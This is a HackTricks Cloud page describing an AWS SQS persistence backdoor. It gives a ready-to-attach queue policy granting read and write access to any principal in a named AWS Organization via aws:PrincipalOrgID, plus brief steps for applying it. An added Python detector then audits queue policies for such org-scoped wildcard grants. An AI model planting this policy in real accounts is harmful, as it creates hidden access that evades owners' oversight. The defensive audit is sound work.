AWS - SQS OrgID Policy Backdoor
tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Abuse an SQS queue resource policy to silently grant Send, Receive and ChangeMessageVisibility to any principal that belongs to a target AWS Organization, using the aws:PrincipalOrgID condition key. This creates a hidden, org-scoped access path that often evades controls which only look for explicit account or role ARNs or for star principals: the Principal is "*", but the condition restricts it to callers whose account is a member of the named Organization.
Backdoor policy (attach it as the SQS queue policy)
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "OrgScopedBackdoor",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sqs:ReceiveMessage",
        "sqs:SendMessage",
        "sqs:ChangeMessageVisibility",
        "sqs:GetQueueAttributes"
      ],
      "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
      "Condition": {
        "StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
      }
    }
  ]
}
Steps
- Obtain the Organization ID through the AWS Organizations API.
- Get the SQS queue ARN and set the queue policy so that it includes the statement above.
- From any principal that belongs to that Organization, send and receive messages on the queue to confirm access.
Impact
- Hidden, Organization-level read and write access to SQS messages from any account in the named AWS Organization.
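The statement above is exactly the shape an ARN-oriented policy scanner misses: the principal is "*", and the only thing bounding it is the aws:PrincipalOrgID condition. The following is an added detection example (not code from HackTricks or from AWS) that parses a queue policy document and reports every Allow statement whose wildcard principal is scoped solely by an Organization ID, marking it as suspicious when that ID is not one of the Organizations you expect to see. The two policy documents are constructed samples; REGION, ACCOUNT_ID, QUEUE_NAME, o-xxxxxxxxxx, the account number and the role name in them are placeholders, not real identifiers.

```python
import json

# Constructed sample: the org-scoped statement from this page, placeholders included.
BACKDOOR_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "OrgScopedBackdoor",
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["sqs:ReceiveMessage", "sqs:SendMessage",
                 "sqs:ChangeMessageVisibility", "sqs:GetQueueAttributes"],
      "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
      "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-xxxxxxxxxx"}}
    }
  ]
}""")

# Constructed sample: a conventional grant to one explicit role ARN (placeholder
# account id and role name). ARN-based scanners see this shape; the audit below ignores it.
EXPLICIT_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ExplicitConsumer",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111111111111:role/ExampleConsumerRole"},
        "Action": "sqs:ReceiveMessage",
        "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
    }],
}


def _as_list(value):
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _is_wildcard_principal(principal):
    """True for Principal "*" or Principal {"AWS": "*"} (or a list containing "*")."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws is not None and "*" in _as_list(aws)
    return False


def _org_ids_in_condition(condition):
    """Collect every aws:PrincipalOrgID value, whatever condition operator wraps it."""
    org_ids = []
    for _operator, key_values in (condition or {}).items():
        if not isinstance(key_values, dict):
            continue
        for key, value in key_values.items():
            if key.lower() == "aws:principalorgid":
                org_ids.extend(_as_list(value))
    return org_ids


def find_org_scoped_grants(policy, trusted_org_ids=()):
    """Report Allow statements that use a wildcard principal bounded only by an
    Organization ID. A bare "*" with no org condition is public access, which
    star-principal checks already catch, so it is deliberately not reported here."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_wildcard_principal(stmt.get("Principal")):
            continue
        org_ids = _org_ids_in_condition(stmt.get("Condition"))
        if not org_ids:
            continue
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "org_ids": org_ids,
            "actions": _as_list(stmt.get("Action", [])),
            # Any org id outside the allowlist is the signal for this backdoor pattern.
            "untrusted_org": any(o not in trusted_org_ids for o in org_ids),
        })
    return findings


if __name__ == "__main__":
    # Offline demo on the constructed samples. Against a live queue the document would
    # come from sqs.get_queue_attributes(QueueUrl=..., AttributeNames=["Policy"])["Attributes"]["Policy"]
    # (a JSON string, so json.loads it first).
    for name, policy in (("backdoor", BACKDOOR_POLICY), ("explicit", EXPLICIT_POLICY)):
        print(name, json.dumps(find_org_scoped_grants(policy, trusted_org_ids=()), indent=2))
```

Treat a reported statement whose Organization ID is not on your allowlist as a persistence finding, and treat one that does match your own Organization as a design review item: it still grants every current and future member account of the Organization the listed actions on that queue, so it should be narrowed to explicit principals unless that reach is intended. Alerting on the sqs:SetQueueAttributes CloudTrail event and re-running this check on the new Policy attribute closes the window between the policy change and the next scheduled audit.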